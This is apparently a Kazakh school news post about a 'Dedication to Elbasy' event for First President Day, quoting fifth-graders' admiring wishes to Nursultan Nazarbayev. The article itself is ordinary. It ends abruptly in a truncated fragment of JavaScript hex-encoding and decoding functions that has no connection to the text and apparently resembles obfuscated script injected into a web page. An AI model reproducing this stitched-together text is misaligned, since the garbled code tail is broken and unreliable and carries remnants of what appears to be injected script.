Тұңғыш Президент күніне орай біздің мектебімізде «Елбасыға арнау» акциясы өтті. Акцияның бастаушылары мектеп оқушылары. 5-сынып оқушылары (сынып жетекшісі И.А.Пирожникова) Н.Ә.Назарбаевты осындай жылы лебіздерімен қолдайды:
«Президент- мемлекетіміздің басты адамы, ол ұлт болашағы үшін жауапты.Өзінің көптеген қиындыққа толы жұмысына қарамай ол бізді мейірім мен махаббатқа бөлейді.Бізге бостандықты сыйлады.Әлемде қандай жағдай болса да ,біз бейбіт елде өмір сүрудеміз. Біз –Қазақстан балалары- болашақта президентімізге ұқсағымыз келеді.»- дейді Альбина Тюмина. «Біз Қазақстан деп аталатын, ең керемет елде тұрамыз!Көп ұлтты мемлекетіміз өз тарихымен, ата-бабымыздан сақталып келген дәстүрімен бай.Бірақ, Отанымыздың ең үлкен байлығы- ол, әрине, Президентіміз Нұрсұлтан Әбішұлы Назарбаев және оны қолдап сенім білдірген адамдар. 1-желтоқсанда қазақстандықтар Тұңғыш Президент күнін атап өтеді, дәл осы күні 1991 жылы Нұрсұлтан Әбішұлы елді өз билігіне алды, ал халқымыз оны сөзсіз қолдады. Біз Президентімізбен және халқымызбен мақтанамыз! Осындай айтулы күнде өз халқыңыздан шын жүректен айтылған тілегімізді қабыл алыңыз!» (Кирсанова Анастасия) Брацун Валерия өзінің кіші Отаны үшін, тұрып жатқан қаласы үшін Елбасымызға алғысын білдіреді.Сонымен қатар Лера соғыссыз өмірді бағалайды, оның қандай еңбекпен келетінін біледі: Сізге ұзақ ғұмыр , қажымас қайрат тілегім келеді.» Сапар Данияр : «Сіз біздің елімізді ең жақсы білетін, түсінетін адамсыз.Оның қандай жетістіктерге жеткенін,қандай белестен өткенін сізден артық ешкім білмейді.Сіз біздей жеткіншек ұрпаққа көп жағдай жасадыңыз. Қазіргі балалар елін сүйетін нағыз патриот болуға тиіс.Біздің мемлекетімізде мәңгілік бейбітшілік пен келісім болсын! Маканов Мерхат келесі тілегін жолдайды: «Нұрсұлтан Әбішұлы, біздің мемлекетімізді дәл сіздей адам басқаратынына мен шын жүректен қуанамын .Сізге үлкен табыс, мықты денсаулық, елімізге- байлық пен амандық тілеймін.Соңғы 10 жылдың ішінде Қазақстан күрт өзгерді. Бұл сіздің бізге деген тартуыңыз.Біздің мемлекетіміздің мәртебесі сіздің арқаңыз және оның қажырлы еңбекті талап ететінін білеміз. Бірақ сіздің ұстанған саясатыңыздың арқасында әлі талай жетістікке жетеміз деп сенемін! Баканова Полина өз құрдастарына Президентіміздің еңбек жолын мысал етеді.Себебі әр еңбек өз маманын талап етеді.Нұрсұлтан Әбішұлы өз халқы үшін аянбай еңбек ететін - ұлт мақтанышы! «Біздің президентімізге шыдамдылық тілеймін, ешқашан да мұңаймасын, біздің мемлекетімізді, халқымызды бағаласын.Денсаулығы зор болсын!»- дейді Полина. Ибраева Баянсұлу мемлекетіміздің жан-жақты көркеюін тілейді: ғылымда, өндірісте,медицина мен білім саласында. 5-сынып оқушысы Н.Ә.Назарбаевты қолдан келгенше қолдауға тырысады. Михалькова Екатерина да Елбасымыздың баға жетпес еңбегін көріп те ,біліп те, бағалап та жүр.Нұрсұлтан Әбішұлын бізге көп мүмкіндік сыйлағанына алғыс білдіреді. Ал Лёзов Ярослав біздің Қазақстанды көп ұлтты біріктірген мейрімді және киелі шаңырақ деп бағалайды. Лукьянова Вероника Қазақстанның әрбір қаласымен мақтанатынын жасырмайды.Бірақ оны мазалайтыны өндірісті қалдықтарының табиғатымызды ластайтыны. Оқушы қала ішіне көп ағаш отырғызса мәселе дұрысталады деген пікірде. Алин Давид Президентімізге және оның отбасына таусылмас денсаулық тілейді және немерелері мен шөберелері арасында аман-есен жүргенін тілейді. Мальцев Никита Президентіміздің орасан зор құрметке, марапаттарына ие екенін білсе де, әлемде өз тұғырын биік көрсеткенді тілейді. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e)/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(),p=function()for(var e=0;e